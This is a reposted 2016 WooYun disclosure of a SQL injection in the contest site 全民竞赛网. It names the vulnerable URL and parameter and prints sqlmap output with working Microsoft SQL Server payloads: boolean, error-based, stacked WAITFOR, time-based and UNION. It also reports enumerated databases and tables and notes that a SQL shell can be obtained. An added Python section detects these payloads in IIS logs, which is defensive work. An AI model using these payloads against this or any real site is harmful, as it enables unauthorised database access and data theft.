SQL injection in 全民竞赛网

admin, 2017-04-25 16:07:38
Summary

2016-04-11: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2016-05-26: The vendor has actively ignored the vulnerability; details are disclosed to the public

Vulnerability overview

Defect ID: WooYun-2016-194810

Vulnerability title: SQL injection in 全民竞赛网

Vendor: 全民竞赛网

Author: 路人甲

Submitted: 2016-04-11 10:29

Published: 2016-05-26 10:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: www.wooyun.org; for questions or help please contact

Tags: injection


Vulnerability details

Brief description:

全民竞赛网 is an online contest platform through which governments, enterprises, public institutions and schools run publicity and knowledge-popularisation contests for the public.

Detailed description:

1. 全民竞赛网 has a SQL injection; injection point: http://www.chinese-js.com/NewsDetail.aspx?id=105192

2. Verification with sqlmap:

Code block:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=105192 AND 3822=3822

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=105192 AND 2609=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2609=2609) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113)))

Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3735=3735) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=105192;WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=105192 WAITFOR DELAY '0:0:5'

Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: id=105192 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR(109)+CHAR(106)+CHAR(72)+CHAR(121)+CHAR(121)+CHAR(104)+CHAR(89)+CHAR(68)+CHAR(97)+CHAR(108)+CHAR(77)+CHAR(111)+CHAR(71)+CHAR(109)+CHAR(121)+CHAR(70)+CHAR(80)+CHAR(77)+CHAR(115)+CHAR(102)+CHAR(100)+CHAR(116)+CHAR(75)+CHAR(119)+CHAR(72)+CHAR(67)+CHAR(109)+CHAR(122)+CHAR(99)+CHAR(116)+CHAR(117)+CHAR(102)+CHAR(117)+CHAR(102)+CHAR(106)+CHAR(84)+CHAR(122)+CHAR(104)+CHAR(108)+CHAR(109)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[21:53:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005

3. Enumerated 8 databases


4. The current database is 123js; 201 tables were enumerated

Code block:
Database: 123js
[201 tables]

5. With --sql-shell, a SQL shell can be obtained to operate on the database
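An added detection example, not part of the original report: it scans constructed IIS W3C log lines for requests to NewsDetail.aspx whose id parameter is not a plain integer and labels each payload by the technique families sqlmap reported above. The log lines, addresses and field order are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C log lines, not from the original report. Assumed field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
SAMPLE_LOG = """\
2016-04-11 02:29:10 10.0.0.5 GET /NewsDetail.aspx id=105192 80 - 203.0.113.7 Mozilla/5.0 200
2016-04-11 02:29:11 10.0.0.5 GET /NewsDetail.aspx id=105192+AND+3822%3D3822 80 - 203.0.113.7 sqlmap/1.0 200
2016-04-11 02:29:12 10.0.0.5 GET /NewsDetail.aspx id=105192+AND+2609%3DCONVERT%28INT%2C%28SELECT+CHAR%28113%29%29%29 80 - 203.0.113.7 sqlmap/1.0 500
2016-04-11 02:29:13 10.0.0.5 GET /NewsDetail.aspx id=105192%3BWAITFOR+DELAY+%270%3A0%3A5%27-- 80 - 203.0.113.7 sqlmap/1.0 200
2016-04-11 02:29:19 10.0.0.5 GET /NewsDetail.aspx id=105192+UNION+ALL+SELECT+NULL%2CNULL%2CCHAR%28113%29-- 80 - 203.0.113.7 sqlmap/1.0 200
2016-04-11 02:30:00 10.0.0.5 GET /NewsDetail.aspx id=abc 80 - 198.51.100.9 Mozilla/5.0 404
"""
FIELDS = ["date", "time", "s_ip", "method", "stem", "query", "port", "user", "c_ip", "ua", "status"]

def is_plain_id(value):
    # NewsDetail.aspx?id= should only carry an article number; this allow-list
    # check is also what the application should enforce before querying.
    return re.fullmatch(r"\d{1,10}", value) is not None

def classify(payload):
    # Labels mirror the technique families sqlmap reported for this endpoint.
    labels = []
    if re.search(r"waitfor\s+delay", payload, re.I):
        labels.append("stacked queries" if ";" in payload else "time-based blind")
    if re.search(r"convert\s*\(\s*int\s*,", payload, re.I):
        labels.append("error-based")
    if re.search(r"union\s+all\s+select", payload, re.I):
        labels.append("UNION query")
    if re.search(r"\band\s+\d+\s*=\s*\d+", payload, re.I):
        labels.append("boolean-based blind")
    return labels

def scan(log_text):
    findings = []
    for raw in log_text.splitlines():
        parts = raw.split()
        if len(parts) != len(FIELDS):
            continue  # malformed line or a different log format
        rec = dict(zip(FIELDS, parts))
        if rec["stem"].lower() != "/newsdetail.aspx":
            continue
        # parse_qs URL-decodes, so '+' and %XX sequences become the real payload
        for value in parse_qs(rec["query"]).get("id", []):
            if not is_plain_id(value):
                findings.append({"client": rec["c_ip"], "status": rec["status"],
                                 "id": value, "techniques": classify(value)})
    return findings
```

The integer allow-list in is_plain_id is the same check the application should apply server-side, with the id then bound as a query parameter rather than concatenated into the SQL string.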


Proof of vulnerability:

As above.

Fix:

Add injection protection.

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused

Vulnerability Rank: 15 (WooYun rating)

